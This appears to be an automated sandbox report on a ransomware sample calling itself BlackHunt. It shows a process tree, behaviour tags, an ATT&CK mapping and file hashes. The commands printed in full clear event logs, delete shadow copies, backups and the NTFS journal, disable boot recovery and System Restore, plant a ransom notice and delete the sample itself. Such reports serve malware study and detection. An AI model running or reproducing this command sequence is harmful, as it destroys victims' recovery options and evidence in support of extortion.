C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:10112
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:6328
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:10168
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:5572
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:10184
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:6500
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:6048
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:7912
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:3508
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:6476
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:7868
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:8184
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:6668
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:6604
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:1020
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:3768
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:840
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:2016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:3896
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:1484
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:3448
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:552
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:4744
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:7492 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:884
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 884 -s 14604⤵
- Program crash
PID:5844
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:5424
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:4988
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:3552
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:3416
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe"2⤵PID:5220
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:4004
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:6264
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3724
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:4432
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Enumerates connected drives
- Checks SCSI registry key(s)
PID:4428
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 884 -ip 8841⤵PID:6360
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5503a603f6a5097cd6c92e7124dd965be
SHA1325e60bf2f7e0786b8046c6d525bfa939c9d05e2
SHA256171f89bbede59adc5d991f1c60ab519bbca7f601ed2ce9c1a45363ed8700f395
SHA512a8bd222dae5792ccd3f65c1aa00fa37d33737bc4b70764b3a964a3fb53cac67cf1b642c484778859aa2bd14a6ad97ed8fe2edc2303f72bf350d309e9b66f3228
-
Filesize
12KB
MD53bbf4607c31d6734289e2a784161515b
SHA1d8bc49d2ee3a82bdb3817a5fdc8e8512c35a5c3f
SHA256afa403f1ffe6748a41b080c449421757b56fc4d7f086d8a183a47e1dd0140228
SHA512c81040fdcf66162e8edfbcdfff69580d0dfc7880cff868dbdc49c39bc70c9df40a32ca6bc1e95e2f407f3323c58c3ab94e4127723d64bbab427d9d82486baace
-
Filesize
684B
MD5dda0c855a00bbd91f90439be445f5096
SHA1a15884dc9d332593ba45301811436483576fe9e8
SHA2565921f332e374e67a3775d275d80378bc1cd3c852caff92dae44efe46716b3194
SHA512baf8af8170cf83a2bd586026b6b69d4796b4d7c60b8dc296fe85be49634a4ba89da0178d8f5edb3387d67825637cdca364b43cf7a4ca6fca7faa65acad38230c